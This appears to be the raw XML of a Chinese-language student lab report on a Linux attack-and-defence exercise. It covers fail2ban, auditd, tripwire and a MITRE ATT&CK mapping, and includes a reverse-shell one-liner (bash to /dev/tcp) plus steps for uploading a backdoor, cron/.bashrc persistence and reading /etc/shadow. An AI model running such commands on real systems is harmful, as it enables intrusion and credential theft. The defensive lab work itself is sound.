    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD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[sshd]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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enabled = true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FF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port = ssh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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maxretry = 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000101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bantime = 600</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102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findtime = 600</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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測試：從其他主機連續錯密登入超過 5 次 → 應被封鎖。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104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防禦驗證 2：auditd 偵測後門行為</w:t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追蹤反向 shell 執行（如 /dev/tcp, /bin/bash）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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apt install auditd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108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auditctl -a always,exit -F arch=b64 -S execve -k suspicious-exec</w:t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模擬攻擊行為：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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bash -i &gt;&amp; /dev/tcp/192.168.1.1/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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查詢記錄：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C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sudo ausearch -k suspicious-exec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D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延伸設計與攻防整合</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8"/>
        <w:tblW w:w="643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39"/>
        <w:gridCol w:w="4300"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2139"/>
            <w:gridCol w:w="430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防禦工具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功能與對應行為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tripwire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比對入侵前後的檔案異動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clamav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偵測下載後門檔案、每日自動掃描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rkhunter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偵測 rootkit、異常服務、後門行為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7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MITRE ATT&amp;CK 映射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技術對應：</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">T1059.004 - Unix Shell</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">T1053.003 - Cron</w:t>
              <w:br w:type="textWrapping"/>
              <w:t xml:space="preserve">→ 實驗設計可與防禦策略對應技術分類</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119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展示建議：雙視角呈現攻防過程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011B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攻擊流程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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反向 shell 成功連線（如 bash /dev/tcp）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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上傳並執行 backdoor.sh 後門</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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建立開機自動啟動（.bashrc, cron）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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嘗試提權，存取 /etc/shadow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120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 防禦驗證</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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fail2ban 阻擋 SSH 爆破</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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auditd 偵測 /bin/bash 執行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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tripwire 偵測敏感檔案被竄改</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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logwatch 每日彙整異常行為通報</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16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firewall 封鎖未授權 port</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126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七、工作分配與預定進度甘梯圖</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table9"/>
        <w:tblW w:w="761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25"/>
        <w:gridCol w:w="1280"/>
        <w:gridCol w:w="801"/>
        <w:gridCol w:w="2705"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2825"/>
            <w:gridCol w:w="1280"/>
            <w:gridCol w:w="801"/>
            <w:gridCol w:w="270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27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工作項目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完成時間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負責人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備註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96.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="96"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="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2C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2730.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2730"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="27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2E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Fonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                      <w:rtl w:val="0"/>
                    </w:rPr>
                    <w:t xml:space="preserve">虛擬環境建置與測試網路</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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96.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="96"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="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33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2610.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2610"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="26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35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Fonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                      <w:rtl w:val="0"/>
                    </w:rPr>
                    <w:t xml:space="preserve">完成NAT設定與IP對應</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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96.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="96"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="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38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2490.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2490"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="24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3A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Fonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                      <w:rtl w:val="0"/>
                    </w:rPr>
                    <w:t xml:space="preserve">Shell 腳本撰寫與測試</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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96.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="96"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="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3F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1650.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1650"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="16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41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Fonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                      <w:rtl w:val="0"/>
                    </w:rPr>
                    <w:t xml:space="preserve">包含 bash、nc</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000142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3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滲透流程操作與記錄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攻擊與權限提取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8"/>
              <w:tblW w:w="96.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="96"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="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48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1770.0" w:type="dxa"/>
              <w:jc w:val="left"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="0400"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="1770"/>
              <w:tblGridChange w:id="0">
                <w:tblGrid>
                  <w:gridCol w:w="17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4A">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
                    <w:rPr>
                      <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                      <w:rtl w:val="0"/>
                    </w:rPr>
                    <w:t xml:space="preserve">分析與報告撰寫</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014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2025/06/30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本人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圖文並茂、含流程圖</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014F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八、遭遇問題與解決方案</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000151">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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HTTP Server 卡住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：表示伺服器已啟動並在等待目標主機下載檔案，解決方法是確保不要關閉該視窗。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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nc listener 無反應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：確認目標主機是否執行了反向 shell，並檢查防火牆設置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000153">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="36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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ENOENT 錯誤</w:t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：表示某檔案不存在，使用 strace 跟蹤錯誤來源。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000154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九、儀器設備需求表</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table20"/>
        <w:tblW w:w="783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35"/>
        <w:gridCol w:w="1041"/>
        <w:gridCol w:w="4655"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="2135"/>
            <w:gridCol w:w="1041"/>
            <w:gridCol w:w="465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56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設備名稱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需求數量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rPr>
                <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                <w:b w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                <w:b w:val="1"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">具體需求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9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Kali Linux 虛擬機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用於發起攻擊與控制目標系統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C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OWASP虛擬機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作為靶機，供攻擊測試與滲透演練使用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F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網絡連接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rPr>
                <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">需支持內部網絡連接以執行攻擊與通信操作</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000162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十、參考資料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Offensive Security – Kali Linux Documentation</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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https://www.kali.org/docs/</w:t>
        </w:r>
      </w:hyperlink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OWASP Broken Web Applications Project</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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https://owasp.org/www-project-broken-web-applications/</w:t>
        </w:r>
      </w:hyperlink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Netcat Command Guide</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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https://linux.die.net/man/1/nc</w:t>
        </w:r>
      </w:hyperlink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HackTricks – Linux Privilege Escalation</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="DFKai-SB" w:cs="DFKai-SB" w:eastAsia="DFKai-SB" w:hAnsi="DFKai-SB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https://book.hacktricks.xyz/linux-hardening/privilege-escalation</w:t>
        </w:r>
      </w:hyperlink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《Linux 實戰攻防：滲透測試與弱點利用》，電子工業出版社</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000168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DFKai-SB"/>
  <w:font w:name="PMingLiu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spacing w:after="180" w:before="180" w:line="720" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b w:val="1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865F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 w:customStyle="1">
    <w:name w:val="頁首 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00865F35"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00865F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尾 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a5"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00865F35"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Web">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="00B150FB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hAnsi="Times New Roman"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat w:val="1"/>
    <w:rsid w:val="00180746"/>
    <w:pPr>
      <w:ind w:left="480" w:leftChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="a8">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="002D56D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 w:val="1"/>
    <w:unhideWhenUsed w:val="1"/>
    <w:rsid w:val="002D56D8"/>
    <w:rPr>
      <w:color w:val="605e5c"/>
      <w:shd w:color="auto" w:fill="e1dfdd" w:val="clear"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10" w:customStyle="1">
    <w:name w:val="標題 1 字元"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="004C3707"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:cstheme="majorBidi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:kern w:val="52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owasp.org/www-project-broken-web-applications/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/doc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book.hacktricks.xyz/linux-hardening/privilege-escalation" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linux.die.net/man/1/nc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9NvZnhdyStB2rZgGx4DnQrSLWQ==">CgMxLjA4AHIhMUNNS0FIOHlISTFaU0t5WThtd1Q4Nl9wRjZnbFRmZTdO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2025-06-26T11:02:00Z</dcterms:created>
  <dc:creator>CSIE</dc:creator>
</cp:coreProperties>
</file>